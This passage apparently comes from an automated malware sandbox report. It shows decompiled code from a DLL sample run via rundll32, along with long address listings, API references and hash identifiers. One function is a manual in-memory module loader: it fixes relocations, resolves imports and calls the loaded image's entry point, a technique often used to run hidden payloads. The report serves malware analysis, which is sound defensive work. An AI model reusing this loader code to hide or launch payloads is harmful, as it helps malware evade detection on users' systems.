                                                                                                                                                                                                                                                                            									GetLastError();
                                                                                                                                                                                                                                                                            									L26:
                                                                                                                                                                                                                                                                            									_t136 =  *0x10020fb8; // 0x0
                                                                                                                                                                                                                                                                            									 *((intOrPtr*)(_t136 + 8))(_t156);
                                                                                                                                                                                                                                                                            									_t156 = 0;
                                                                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                                                                            									goto L27;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								GetLastError();
                                                                                                                                                                                                                                                                            								L27:
                                                                                                                                                                                                                                                                            								_t138 =  *0x10020fb8; // 0x0
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t138 + 8))(_t183);
                                                                                                                                                                                                                                                                            								_t183 = 0;
                                                                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						GetLastError();
                                                                                                                                                                                                                                                                            						L28:
                                                                                                                                                                                                                                                                            						_t168 = _t186;
                                                                                                                                                                                                                                                                            						_t176 = _v28 + 1;
                                                                                                                                                                                                                                                                            						_v28 = _t176;
                                                                                                                                                                                                                                                                            						__eflags = _t176 - 2;
                                                                                                                                                                                                                                                                            					} while (_t176 < 2);
                                                                                                                                                                                                                                                                            					_v8 = _t186;
                                                                                                                                                                                                                                                                            					__eflags = _t168;
                                                                                                                                                                                                                                                                            					if(_t168 != 0) {
                                                                                                                                                                                                                                                                            						goto L31;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t188 = 0xfffffffe;
                                                                                                                                                                                                                                                                            					goto L36;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t154 = 0xfffffffc;
                                                                                                                                                                                                                                                                            				return _t154;
                                                                                                                                                                                                                                                                            			}
































































                                                                                                                                                                                                                                                                            0x1000f11f
                                                                                                                                                                                                                                                                            0x1000f128
                                                                                                                                                                                                                                                                            0x1000f135
                                                                                                                                                                                                                                                                            0x1000f137
                                                                                                                                                                                                                                                                            0x1000f13f
                                                                                                                                                                                                                                                                            0x1000f148
                                                                                                                                                                                                                                                                            0x1000f154
                                                                                                                                                                                                                                                                            0x1000f165
                                                                                                                                                                                                                                                                            0x1000f16a
                                                                                                                                                                                                                                                                            0x1000f177
                                                                                                                                                                                                                                                                            0x1000f17a
                                                                                                                                                                                                                                                                            0x1000f186
                                                                                                                                                                                                                                                                            0x1000f189
                                                                                                                                                                                                                                                                            0x1000f195
                                                                                                                                                                                                                                                                            0x1000f198
                                                                                                                                                                                                                                                                            0x1000f1a4
                                                                                                                                                                                                                                                                            0x1000f1a7
                                                                                                                                                                                                                                                                            0x1000f1ae
                                                                                                                                                                                                                                                                            0x1000f1b3
                                                                                                                                                                                                                                                                            0x1000f1b9
                                                                                                                                                                                                                                                                            0x1000f1bb
                                                                                                                                                                                                                                                                            0x1000f1c3
                                                                                                                                                                                                                                                                            0x1000f1ce
                                                                                                                                                                                                                                                                            0x1000f1d5
                                                                                                                                                                                                                                                                            0x1000f1e1
                                                                                                                                                                                                                                                                            0x1000f1e4
                                                                                                                                                                                                                                                                            0x1000f1f2
                                                                                                                                                                                                                                                                            0x1000f1f5
                                                                                                                                                                                                                                                                            0x1000f1fb
                                                                                                                                                                                                                                                                            0x1000f1fc
                                                                                                                                                                                                                                                                            0x1000f1fe
                                                                                                                                                                                                                                                                            0x1000f207
                                                                                                                                                                                                                                                                            0x1000f208
                                                                                                                                                                                                                                                                            0x1000f20d
                                                                                                                                                                                                                                                                            0x1000f213
                                                                                                                                                                                                                                                                            0x1000f21d
                                                                                                                                                                                                                                                                            0x1000f21d
                                                                                                                                                                                                                                                                            0x1000f21f
                                                                                                                                                                                                                                                                            0x1000f224
                                                                                                                                                                                                                                                                            0x1000f224
                                                                                                                                                                                                                                                                            0x1000f233
                                                                                                                                                                                                                                                                            0x1000f242
                                                                                                                                                                                                                                                                            0x1000f244
                                                                                                                                                                                                                                                                            0x1000f246
                                                                                                                                                                                                                                                                            0x1000f255
                                                                                                                                                                                                                                                                            0x1000f26c
                                                                                                                                                                                                                                                                            0x1000f272
                                                                                                                                                                                                                                                                            0x1000f275
                                                                                                                                                                                                                                                                            0x1000f279
                                                                                                                                                                                                                                                                            0x1000f27b
                                                                                                                                                                                                                                                                            0x1000f280
                                                                                                                                                                                                                                                                            0x1000f280
                                                                                                                                                                                                                                                                            0x1000f285
                                                                                                                                                                                                                                                                            0x1000f287
                                                                                                                                                                                                                                                                            0x1000f294
                                                                                                                                                                                                                                                                            0x1000f298
                                                                                                                                                                                                                                                                            0x1000f29d
                                                                                                                                                                                                                                                                            0x1000f29f
                                                                                                                                                                                                                                                                            0x1000f29f
                                                                                                                                                                                                                                                                            0x1000f2a2
                                                                                                                                                                                                                                                                            0x1000f2a6
                                                                                                                                                                                                                                                                            0x1000f2ab
                                                                                                                                                                                                                                                                            0x1000f2ad
                                                                                                                                                                                                                                                                            0x1000f2ad
                                                                                                                                                                                                                                                                            0x1000f2bc
                                                                                                                                                                                                                                                                            0x1000f2c4
                                                                                                                                                                                                                                                                            0x1000f2ca
                                                                                                                                                                                                                                                                            0x1000f2cd
                                                                                                                                                                                                                                                                            0x1000f2d1
                                                                                                                                                                                                                                                                            0x1000f2d3
                                                                                                                                                                                                                                                                            0x1000f2d6
                                                                                                                                                                                                                                                                            0x1000f2d8
                                                                                                                                                                                                                                                                            0x1000f2db
                                                                                                                                                                                                                                                                            0x1000f2db
                                                                                                                                                                                                                                                                            0x1000f2e0
                                                                                                                                                                                                                                                                            0x1000f2e2
                                                                                                                                                                                                                                                                            0x1000f2ef
                                                                                                                                                                                                                                                                            0x1000f2f3
                                                                                                                                                                                                                                                                            0x1000f2f5
                                                                                                                                                                                                                                                                            0x1000f2f7
                                                                                                                                                                                                                                                                            0x1000f2f7
                                                                                                                                                                                                                                                                            0x1000f2fc
                                                                                                                                                                                                                                                                            0x1000f300
                                                                                                                                                                                                                                                                            0x1000f33c
                                                                                                                                                                                                                                                                            0x1000f342
                                                                                                                                                                                                                                                                            0x1000f34b
                                                                                                                                                                                                                                                                            0x1000f302
                                                                                                                                                                                                                                                                            0x1000f307
                                                                                                                                                                                                                                                                            0x1000f310
                                                                                                                                                                                                                                                                            0x1000f315
                                                                                                                                                                                                                                                                            0x1000f320
                                                                                                                                                                                                                                                                            0x1000f326
                                                                                                                                                                                                                                                                            0x1000f32d
                                                                                                                                                                                                                                                                            0x1000f334
                                                                                                                                                                                                                                                                            0x1000f339
                                                                                                                                                                                                                                                                            0x1000f34e
                                                                                                                                                                                                                                                                            0x1000f352
                                                                                                                                                                                                                                                                            0x1000f357
                                                                                                                                                                                                                                                                            0x1000f357
                                                                                                                                                                                                                                                                            0x1000f35c
                                                                                                                                                                                                                                                                            0x1000f360
                                                                                                                                                                                                                                                                            0x1000f3a9
                                                                                                                                                                                                                                                                            0x1000f3ab
                                                                                                                                                                                                                                                                            0x1000f3ae
                                                                                                                                                                                                                                                                            0x1000f3b6
                                                                                                                                                                                                                                                                            0x1000f3ba
                                                                                                                                                                                                                                                                            0x1000f3bd
                                                                                                                                                                                                                                                                            0x1000f3cf
                                                                                                                                                                                                                                                                            0x1000f3da
                                                                                                                                                                                                                                                                            0x1000f3dc
                                                                                                                                                                                                                                                                            0x1000f3f1
                                                                                                                                                                                                                                                                            0x1000f3f3
                                                                                                                                                                                                                                                                            0x1000f3f9
                                                                                                                                                                                                                                                                            0x1000f42e
                                                                                                                                                                                                                                                                            0x1000f433
                                                                                                                                                                                                                                                                            0x1000f438
                                                                                                                                                                                                                                                                            0x1000f43a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000f43a
                                                                                                                                                                                                                                                                            0x1000f3fb
                                                                                                                                                                                                                                                                            0x1000f3fd
                                                                                                                                                                                                                                                                            0x1000f3fd
                                                                                                                                                                                                                                                                            0x1000f406
                                                                                                                                                                                                                                                                            0x1000f409
                                                                                                                                                                                                                                                                            0x1000f409
                                                                                                                                                                                                                                                                            0x1000f40b
                                                                                                                                                                                                                                                                            0x1000f40d
                                                                                                                                                                                                                                                                            0x1000f413
                                                                                                                                                                                                                                                                            0x1000f413
                                                                                                                                                                                                                                                                            0x1000f416
                                                                                                                                                                                                                                                                            0x1000f418
                                                                                                                                                                                                                                                                            0x1000f41a
                                                                                                                                                                                                                                                                            0x1000f421
                                                                                                                                                                                                                                                                            0x1000f421
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000f424
                                                                                                                                                                                                                                                                            0x1000f3de
                                                                                                                                                                                                                                                                            0x1000f3e6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000f362
                                                                                                                                                                                                                                                                            0x1000f362
                                                                                                                                                                                                                                                                            0x1000f368
                                                                                                                                                                                                                                                                            0x1000f36e
                                                                                                                                                                                                                                                                            0x1000f371
                                                                                                                                                                                                                                                                            0x1000f371
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000f371
                                                                                                                                                                                                                                                                            0x1000f2e4
                                                                                                                                                                                                                                                                            0x1000f2e4
                                                                                                                                                                                                                                                                            0x1000f373
                                                                                                                                                                                                                                                                            0x1000f373
                                                                                                                                                                                                                                                                            0x1000f379
                                                                                                                                                                                                                                                                            0x1000f37c
                                                                                                                                                                                                                                                                            0x1000f37c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000f37c
                                                                                                                                                                                                                                                                            0x1000f289
                                                                                                                                                                                                                                                                            0x1000f289
                                                                                                                                                                                                                                                                            0x1000f37e
                                                                                                                                                                                                                                                                            0x1000f37e
                                                                                                                                                                                                                                                                            0x1000f384
                                                                                                                                                                                                                                                                            0x1000f387
                                                                                                                                                                                                                                                                            0x1000f387
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000f387
                                                                                                                                                                                                                                                                            0x1000f287
                                                                                                                                                                                                                                                                            0x1000f248
                                                                                                                                                                                                                                                                            0x1000f389
                                                                                                                                                                                                                                                                            0x1000f38c
                                                                                                                                                                                                                                                                            0x1000f38e
                                                                                                                                                                                                                                                                            0x1000f391
                                                                                                                                                                                                                                                                            0x1000f394
                                                                                                                                                                                                                                                                            0x1000f394
                                                                                                                                                                                                                                                                            0x1000f39d
                                                                                                                                                                                                                                                                            0x1000f3a0
                                                                                                                                                                                                                                                                            0x1000f3a2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000f3a6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000f3a6
                                                                                                                                                                                                                                                                            0x1000f217
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 1000F154
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 1000F165
                                                                                                                                                                                                                                                                              • Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 1000F248
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memset$ErrorLast
                                                                                                                                                                                                                                                                            • String ID: GET$POST
                                                                                                                                                                                                                                                                            • API String ID: 2570506013-3192705859
                                                                                                                                                                                                                                                                            • Opcode ID: 3fe8ed42323438c95cbd423daaf787408dc2ec82612b357b8314e3646d689d1a
                                                                                                                                                                                                                                                                            • Instruction ID: c87b9fb0a9fafe7a4f3f35a8b55887b992dd21be3c4982e5565fa784aea7ae63
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fe8ed42323438c95cbd423daaf787408dc2ec82612b357b8314e3646d689d1a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8A19EB5900219AFEB50DFA4CC84AEEB7F9EF48350F208029F505E7695DB749A41CF50
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _snprintfqsort
                                                                                                                                                                                                                                                                            • String ID: %I64d$false$null$true
                                                                                                                                                                                                                                                                            • API String ID: 756996078-4285102228
                                                                                                                                                                                                                                                                            • Opcode ID: 47a3a100da203642488b1b01a907a1b11e44da986f7d1736df3d4d16a275fc55
                                                                                                                                                                                                                                                                            • Instruction ID: 99e7c3b995d16f303a99f6db7a251a1efad8bffc3f45fe7ed278e0bcb9f1f9da
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47a3a100da203642488b1b01a907a1b11e44da986f7d1736df3d4d16a275fc55
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54E15BB190024ABBDF15DFA4DC42EEF3BA9EF45384F108019FE149A141E735DAE19BA1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 28%
                                                                                                                                                                                                                                                                            			E1001472A(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
                                                                                                                                                                                                                                                                            				signed int _v5;
                                                                                                                                                                                                                                                                            				signed short _v12;
                                                                                                                                                                                                                                                                            				intOrPtr* _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				signed int* _v24;
                                                                                                                                                                                                                                                                            				unsigned int _v28;
                                                                                                                                                                                                                                                                            				signed short* _v32;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                                            				intOrPtr* _v48;
                                                                                                                                                                                                                                                                            				signed short* _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				unsigned int _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v68;
                                                                                                                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                                                                                                                                            				unsigned int _v88;
                                                                                                                                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                                                                                                                            				intOrPtr _v100;
                                                                                                                                                                                                                                                                            				intOrPtr _v104;
                                                                                                                                                                                                                                                                            				intOrPtr _v108;
                                                                                                                                                                                                                                                                            				intOrPtr _v112;
                                                                                                                                                                                                                                                                            				CHAR* _v116;
                                                                                                                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                                                                                                                            				intOrPtr _v124;
                                                                                                                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                                                                                                                            				signed int _t220;
                                                                                                                                                                                                                                                                            				signed int _t237;
                                                                                                                                                                                                                                                                            				void* _t277;
                                                                                                                                                                                                                                                                            				signed int _t282;
                                                                                                                                                                                                                                                                            				signed int _t284;
                                                                                                                                                                                                                                                                            				intOrPtr _t324;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v44 = _v44 & 0x00000000;
                                                                                                                                                                                                                                                                            				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                                                                                                                            				_v20 = _v84;
                                                                                                                                                                                                                                                                            				_t324 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
                                                                                                                                                                                                                                                                            				_v64 = _t324;
                                                                                                                                                                                                                                                                            				if(_t324 == 0) {
                                                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                                                            					while(0 != 0) {
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_push(8);
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
                                                                                                                                                                                                                                                                            						L35:
                                                                                                                                                                                                                                                                            						if(_a16 == 0) {
                                                                                                                                                                                                                                                                            							L54:
                                                                                                                                                                                                                                                                            							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
                                                                                                                                                                                                                                                                            							while(0 != 0) {
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							if(_a12 != 0) {
                                                                                                                                                                                                                                                                            								 *_a12 = _v80;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
                                                                                                                                                                                                                                                                            							E100144D8(GetCurrentProcess(),  *0x10020fe4, _t203, _a4, _a4);
                                                                                                                                                                                                                                                                            							_v124 = _v80(_a4, 1, _a8);
                                                                                                                                                                                                                                                                            							while(0 != 0) {
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							if(_v124 != 0) {
                                                                                                                                                                                                                                                                            								if(_v44 == 0) {
                                                                                                                                                                                                                                                                            									L77:
                                                                                                                                                                                                                                                                            									return 1;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(_a20 != 1) {
                                                                                                                                                                                                                                                                            									if(_a20 != 2) {
                                                                                                                                                                                                                                                                            										L75:
                                                                                                                                                                                                                                                                            										while(0 != 0) {
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										goto L77;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									while(0 != 0) {
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v132 = _v44;
                                                                                                                                                                                                                                                                            									goto L75;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								while(0 != 0) {
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v44();
                                                                                                                                                                                                                                                                            								goto L75;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							while(0 != 0) {
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						while(0 != 0) {
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_push(8);
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
                                                                                                                                                                                                                                                                            							goto L54;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v128 = 0x80000000;
                                                                                                                                                                                                                                                                            						_t220 = 8;
                                                                                                                                                                                                                                                                            						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t220 * 0));
                                                                                                                                                                                                                                                                            						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
                                                                                                                                                                                                                                                                            						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
                                                                                                                                                                                                                                                                            						_v104 =  *((intOrPtr*)(_v76 + 0x18));
                                                                                                                                                                                                                                                                            						while(0 != 0) {
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v40 = _v40 & 0x00000000;
                                                                                                                                                                                                                                                                            						while(_v40 < _v104) {
                                                                                                                                                                                                                                                                            							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
                                                                                                                                                                                                                                                                            							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
                                                                                                                                                                                                                                                                            							if(lstrcmpA(_v116, _a16) != 0) {
                                                                                                                                                                                                                                                                            								_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							while(0 != 0) {
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v44 = _v120;
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(_v44 != 0) {
                                                                                                                                                                                                                                                                            							goto L54;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						while(0 != 0) {
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						return 0xffffffff;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v96 = 0x80000000;
                                                                                                                                                                                                                                                                            					_t237 = 8;
                                                                                                                                                                                                                                                                            					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t237 << 0) + 0x78));
                                                                                                                                                                                                                                                                            					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                                                                                                                                                                                                                                                            						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                                                                                                                            						if(_v36 == 0) {
                                                                                                                                                                                                                                                                            							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(_v36 != 0) {
                                                                                                                                                                                                                                                                            							if( *_v16 == 0) {
                                                                                                                                                                                                                                                                            								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v24 =  *_v16 + _a4;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v72 = _v72 & 0x00000000;
                                                                                                                                                                                                                                                                            							while( *_v24 != 0) {
                                                                                                                                                                                                                                                                            								if(( *_v24 & _v96) == 0) {
                                                                                                                                                                                                                                                                            									_v100 =  *_v24 + _a4;
                                                                                                                                                                                                                                                                            									_v68 = GetProcAddress(_v36, _v100 + 2);
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                                                                                                                                                                                                                                                            									 *_v24 = _v68;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v24 =  &(_v24[1]);
                                                                                                                                                                                                                                                                            								_v72 = _v72 + 4;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v16 = _v16 + 0x14;
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_t277 = 0xfffffffd;
                                                                                                                                                                                                                                                                            							return _t277;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L35;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t282 = 8;
                                                                                                                                                                                                                                                                            				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t282 * 5));
                                                                                                                                                                                                                                                                            				_t284 = 8;
                                                                                                                                                                                                                                                                            				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t284 * 5));
                                                                                                                                                                                                                                                                            				while(0 != 0) {
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				while(_v56 > 0) {
                                                                                                                                                                                                                                                                            					_v28 = _v52[2];
                                                                                                                                                                                                                                                                            					_v56 = _v56 - _v28;
                                                                                                                                                                                                                                                                            					_v28 = _v28 - 8;
                                                                                                                                                                                                                                                                            					_v28 = _v28 >> 1;
                                                                                                                                                                                                                                                                            					_v32 =  &(_v52[4]);
                                                                                                                                                                                                                                                                            					_v92 = _a4 +  *_v52;
                                                                                                                                                                                                                                                                            					_v60 = _v28;
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						_v88 = _v60;
                                                                                                                                                                                                                                                                            						_v60 = _v60 - 1;
                                                                                                                                                                                                                                                                            						if(_v88 == 0) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                                                                                                                                                                                                                                                            						_v12 =  *_v32 & 0xfff;
                                                                                                                                                                                                                                                                            						_v48 = (_v12 & 0x0000ffff) + _v92;
                                                                                                                                                                                                                                                                            						if((_v5 & 0x000000ff) != 3) {
                                                                                                                                                                                                                                                                            							if((_v5 & 0x000000ff) == 0xa) {
                                                                                                                                                                                                                                                                            								 *_v48 =  *_v48 + _v64;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							 *_v48 =  *_v48 + _v64;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v32 =  &(_v32[1]);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v52 = _v32;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L13;
                                                                                                                                                                                                                                                                            			}









































                                                                                                                                                                                                                                                                            0x10014733
                                                                                                                                                                                                                                                                            0x10014740
                                                                                                                                                                                                                                                                            0x10014746
                                                                                                                                                                                                                                                                            0x1001474f
                                                                                                                                                                                                                                                                            0x10014752
                                                                                                                                                                                                                                                                            0x10014755
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014846
                                                                                                                                                                                                                                                                            0x1001484a
                                                                                                                                                                                                                                                                            0x1001484c
                                                                                                                                                                                                                                                                            0x1001485a
                                                                                                                                                                                                                                                                            0x10014978
                                                                                                                                                                                                                                                                            0x1001497c
                                                                                                                                                                                                                                                                            0x10014a44
                                                                                                                                                                                                                                                                            0x10014a4d
                                                                                                                                                                                                                                                                            0x10014a50
                                                                                                                                                                                                                                                                            0x10014a54
                                                                                                                                                                                                                                                                            0x10014a5a
                                                                                                                                                                                                                                                                            0x10014a62
                                                                                                                                                                                                                                                                            0x10014a62
                                                                                                                                                                                                                                                                            0x10014a6a
                                                                                                                                                                                                                                                                            0x10014a80
                                                                                                                                                                                                                                                                            0x10014a93
                                                                                                                                                                                                                                                                            0x10014a96
                                                                                                                                                                                                                                                                            0x10014a9a
                                                                                                                                                                                                                                                                            0x10014aa0
                                                                                                                                                                                                                                                                            0x10014ab0
                                                                                                                                                                                                                                                                            0x10014adb
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014add
                                                                                                                                                                                                                                                                            0x10014ab6
                                                                                                                                                                                                                                                                            0x10014ac7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014ad5
                                                                                                                                                                                                                                                                            0x10014ad9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014ad5
                                                                                                                                                                                                                                                                            0x10014ac9
                                                                                                                                                                                                                                                                            0x10014acd
                                                                                                                                                                                                                                                                            0x10014ad2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014ad2
                                                                                                                                                                                                                                                                            0x10014ab8
                                                                                                                                                                                                                                                                            0x10014abc
                                                                                                                                                                                                                                                                            0x10014abe
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014abe
                                                                                                                                                                                                                                                                            0x10014aa2
                                                                                                                                                                                                                                                                            0x10014aa6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014aa8
                                                                                                                                                                                                                                                                            0x10014982
